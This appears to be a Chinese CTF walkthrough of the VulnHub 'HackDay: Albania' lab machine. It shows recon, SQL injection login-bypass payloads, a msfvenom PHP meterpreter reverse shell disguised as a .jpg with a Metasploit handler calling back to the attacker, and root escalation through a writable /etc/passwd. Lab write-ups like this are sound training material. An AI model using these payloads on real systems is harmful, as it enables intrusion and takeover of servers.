概述:

SRE实战 互联网时代守护先锋,助力企业售后服务体系运筹帷幄!一键直达领取阿里云限量特价优惠。

Name: HackDay: Albania

Date release: 18 Nov 2016

Author: R-73eN

Series: HackDay

 

下载:

https://download.vulnhub.com/hackday/HackDay-Albania.ova

 

nmap扫描探测

Hacking HackDay: Albania Safe 第1张

http://10.10.202.133:8008/

Mr . robot

Hacking HackDay: Albania Safe 第2张

╰─ dirb http://10.10.202.133:8008/

Hacking HackDay: Albania Safe 第3张

Hacking HackDay: Albania Safe 第4张

挨着尝试访问,最后/unisxcudkqjydw/ 这个比较有价值

 Hacking HackDay: Albania Safe 第5张

Hacking HackDay: Albania Safe 第6张

 

Hacking HackDay: Albania Safe 第7张

 

 

 

尝试SQLmap盲注跑一波

尝试抓包:

POST /unisxcudkqjydw/vulnbank/client/login.php HTTP/1.1

Host: 10.10.202.133:8008

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://10.10.202.133:8008/unisxcudkqjydw/vulnbank/client/login

Cookie: SESS93de7c0ce497c83093bc4a5806deade0=d66ig2hk5ufi6rr3o8dsjr8pf2; PHPSESSID=ue38kb5dtgl000bheit23llit7

Connection: close

Upgrade-Insecure-Requests: 1

Content-Type: application/x-www-form-urlencoded

Content-Length: 27

 

username=admin&password=123456

 

╰─ sqlmap -r 1.txt --level=5 

Hacking HackDay: Albania Safe 第8张

 

Username admin'

Password: admin

Hacking HackDay: Albania Safe 第9张

MySQL中的注释符 # --

Username: ' or '1' = '1

Password:  ' or '1' = '1

Hacking HackDay: Albania Safe 第10张

Username: ' or 'aucc' = 'aucc';#

password: 为空,或者随便填写

Select * from users where username='$username' and password='$passwrod'

Select * from users where username='' or 'aucc' = 'aucc';#' and password=''

Select * from users where username=''  or  'aucc' = 'aucc';    #永远为真

 

Username: admin' or 'admin'='admin' --

Password: '#

Select * from users where username='$username' and password='$passwrod'

Select * from users where username='admin' or 'admin'='admin' --' and password=''#'

Select * from users where username='admin' or 'admin'='admin'  and password=''  #永远为真

Hacking HackDay: Albania Safe 第11张

上传PHP脚本文件,提示:After we got hacked we our allowing only image files to upload such as jpg , jpeg , bmp etc.

 

这是使用PHP反弹shell

╰─ msfvenom -p  php/meterpreter/reverse_tcp lhost=10.10.202.135 lport=444 -f raw > hack404.jpg

 Hacking HackDay: Albania Safe 第12张

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp

msf5 exploit(multi/handler) > set lhost 10.10.202.135

msf5 exploit(multi/handler) > set lport 4444

msf5 exploit(multi/handler) > show options

Hacking HackDay: Albania Safe 第13张

Hacking HackDay: Albania Safe 第14张

提权

寻找可写文件

find / -writable -type f 2>/dev/null

/etc/passwd

Hacking HackDay: Albania Safe 第15张

╰─ openssl passwd -1 -salt hack404

Password:

$1$hack404$N5Uuhmgb2KCDq5X8GxB7V0

Hacking HackDay: Albania Safe 第16张

Hacking HackDay: Albania Safe 第17张

Hacking HackDay: Albania Safe 第18张

Hacking HackDay: Albania Safe 第19张

 

扫码关注我们
微信号:SRE实战
拒绝背锅 运筹帷幄